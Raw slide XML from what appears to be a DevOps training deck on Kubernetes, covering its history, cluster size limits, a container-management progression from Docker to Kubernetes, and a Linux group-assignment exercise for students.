              <a:t> (enterprise Kubernetes distribution by Red Hat).</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-293528" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1023"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubeflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> emerged for AI/ML workflows on Kubernetes.</a:t>
            </a:r>
            <a:endParaRPr sz="1165">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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2" name="Shape 5032"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5033" name="Google Shape;5033;p818"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420450" y="254450"/>
            <a:ext cx="8520600" cy="42819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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key Milestones</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Kubernetes announced and developed at Google.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Kubernetes 1.0 released; CNCF established.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016-2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Broad adoption by major cloud providers GCP,AWS and Azure.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Helm and Istio gain traction; Kubernetes becomes industry standard.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2020s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Edge computing, AI/ML integration, and increased enterprise adoption.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 5037"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5038" name="Google Shape;5038;p819"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="272175" y="315375"/>
            <a:ext cx="8494623" cy="4512749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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2" name="Shape 5042"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5043" name="Google Shape;5043;p820"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500375" y="152400"/>
            <a:ext cx="7941595" cy="4838700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5044" name="Google Shape;5044;p820"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7353148" y="208000"/>
            <a:ext cx="1569150" cy="447275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 5048"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5049" name="Google Shape;5049;p821"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="217650" y="152400"/>
            <a:ext cx="8112790" cy="4838700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 5053"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5054" name="Google Shape;5054;p822"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514925" y="172424"/>
            <a:ext cx="8114150" cy="4564201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5055" name="Google Shape;5055;p822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090025" y="3701575"/>
            <a:ext cx="23922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500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>45.136.17.143</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USA</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5056" name="Google Shape;5056;p822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5994025" y="0"/>
            <a:ext cx="23922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45.136.17.144 Japan</a:t>
            </a:r>
            <a:endParaRPr sz="100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5057" name="Google Shape;5057;p822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765825" y="4654325"/>
            <a:ext cx="23922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rPr>
              <a:t>…     5000 Worker Nodes</a:t>
            </a:r>
            <a:endParaRPr sz="100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5058" name="Google Shape;5058;p822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7545900" y="456600"/>
            <a:ext cx="1598100" cy="41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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110 Pods</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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2" name="Shape 5062"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5063" name="Google Shape;5063;p823">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>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600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maximum nodes per cluster: 5,000 (officially tested)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maximum pods per node: 110</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maximum pods per cluster: 150,000</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84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32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2296" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093450" y="218650"/>
            <a:ext cx="1018400" cy="1181775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1047975"/>
            <a:ext cx="8520600" cy="3388800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux is most important skill that every software or devops </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>engineer should learn</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84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04"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2018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Group </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Google Shape;573;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947125" y="1014300"/>
            <a:ext cx="7845300" cy="3666000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-454977" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create "OKLABS" Group</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-454977" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assign 4 User (Students) to the "OKLABS" group</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-454977" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Show the proof</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide8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7" name="Shape 5067"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5068" name="Google Shape;5068;p824"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="475600"/>
            <a:ext cx="8839197" cy="4192305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide8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2" name="Shape 5072"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5073" name="Google Shape;5073;p825"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="395825"/>
            <a:ext cx="8520600" cy="4173000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Docker Run (Very Basic Level of Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Docker Compose  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Container Management )</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Kubernetes ( Distributed Container Management )</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
